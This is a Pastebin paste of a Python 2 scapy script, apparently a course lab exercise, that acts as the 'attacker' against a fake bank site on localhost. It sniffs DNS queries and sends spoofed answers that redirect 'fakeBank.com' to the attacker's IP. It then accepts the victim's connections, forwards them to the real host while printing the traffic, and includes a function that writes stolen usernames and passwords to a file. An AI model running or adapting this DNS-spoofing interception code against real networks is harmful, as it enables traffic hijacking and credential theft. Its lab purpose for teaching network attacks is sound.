daily pastebin goal
69%
SHARE
TWEET

Untitled

a guest Jun 8th, 2017 121 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import argparse
  2. import socket
  3. from scapy.all import *
  4.  
  5. conf.L3socket = L3RawSocket
  6. WEB_PORT = 8000
  7. HOSTNAME = "fakeBank.com"
  8.  
  9. def resolveHostname(hostname):
  10.         # IP address of HOSTNAME. Used to forward tcp connection.                                          
  11.         # Normally obtained via DNS lookup.                                                                
  12.         return "127.1.1.1"
  13.  
  14. def log_credentials(username, password):
  15.         # Write stolen credentials out to file                                                              
  16.         with open("lib/attacker/StolenCreds.txt","wb") as fd:
  17.                 fd.write("Stolen credentials: username="+username+" password="+password)
  18.  
  19. def check_credentials(client_data):
  20.         # TODO: Take a block of client data and search for username/password credentials                    
  21.         # If found, log the credentials to the system by calling log_credentials().                        
  22.         print client_data
  23.  
  24. def handle_tcp_forwarding(client_socket, client_ip, hostname):
  25.         # TODO: Continuously intercept new connections from the client                                      
  26.         # and initiate a connection with the host in order to forward data                                  
  27.  
  28.         client_socket.listen(1)
  29.         while True:
  30.  
  31.                 # TODO: accept a new connection from the client on client_socket and                        
  32.                 # create a new socket to connect to the actual host associated with hostname    
  33.                 print "before accept"
  34.                 conn, addr = client_socket.accept()  
  35.                 print "after accept"
  36.                 host_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  37.                 host_sock.connect((resolveHostname(hostname), WEB_PORT))
  38.  
  39.                 # TODO: read data from client socket, check for credentials, and forward along to          
  40.                 # host socket. Check for POST to '/post_logout' and exit after that request has completed.  
  41.                 data = conn.recv(5000)
  42.                 print data
  43.                 check_credentials(data)
  44.                 host_sock.send(data)
  45.                 result = host_sock.recv(5000)
  46.                 conn.send(result)
  47.                 host_sock.close()
  48.                
  49.  
  50. def dns_callback(packet,extra_args):
  51.         # TODO: Write callback function for handling DNS packets.                                          
  52.         # Sends a spoofed DNS response for a query to HOSTNAME and calls handle_tcp_forwarding() after successful spoof                                                                                                
  53.         source_ip, sock = extra_args
  54.         client_ip = packet[IP].src
  55.         print "client_ip: ", client_ip
  56.         ip_header = IP(src=packet[IP].dst, dst=packet[IP].src)
  57.         udp_header = UDP(sport=packet[UDP].dport, dport=packet[UDP].sport)
  58.         # dns_header = DNS(id=packet[DNS].id, qr=1, aa=1, qd=packet[DNS].qd, an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=source_ip))
  59.         dns_header = DNS(id=packet.getlayer(DNS).id, qd=packet.getlayer(DNS).qd, qr=1, aa=1, an=DNSRR(rrname=packet.getlayer(DNS).qd.qname, ttl=10, rdata=source_ip))
  60.         # dnsrr_header = DNSRR(rrname=HOSTNAME, rdata=source_ip)
  61.         spoof_msg = ip_header/udp_header/dns_header
  62.         send(spoof_msg)
  63.         print spoof_msg.summary()
  64.  
  65.         handle_tcp_forwarding(sock, client_ip, HOSTNAME)
  66.  
  67. def sniff_and_spoof(source_ip):
  68.         # TODO: Open a socket and bind it to the attacker's IP and WEB_PORT                                
  69.         # This socket will be used to accept connections from victimized clients  
  70.  
  71.         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  72.         sock.bind((source_ip, WEB_PORT))
  73.  
  74.         # TODO: sniff for DNS packets on the network. Make sure to pass source_ip                          
  75.         # and the socket you created as extra callback arguments.  
  76.         sniff(filter='udp port 53', prn=lambda packet, args=(source_ip,sock):dns_callback(packet, args), iface='lo')      
  77.  
  78. def main():
  79.         parser = argparse.ArgumentParser(description='Attacker who spoofs dns packet and hijacks connection')
  80.         parser.add_argument('--source_ip',nargs='?', const=1, default="127.0.0.3", help='ip of the attacker')
  81.  
  82.         args = parser.parse_args()
  83.         sniff_and_spoof(args.source_ip)
  84.  
  85. if __name__=="__main__":
  86.         main()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top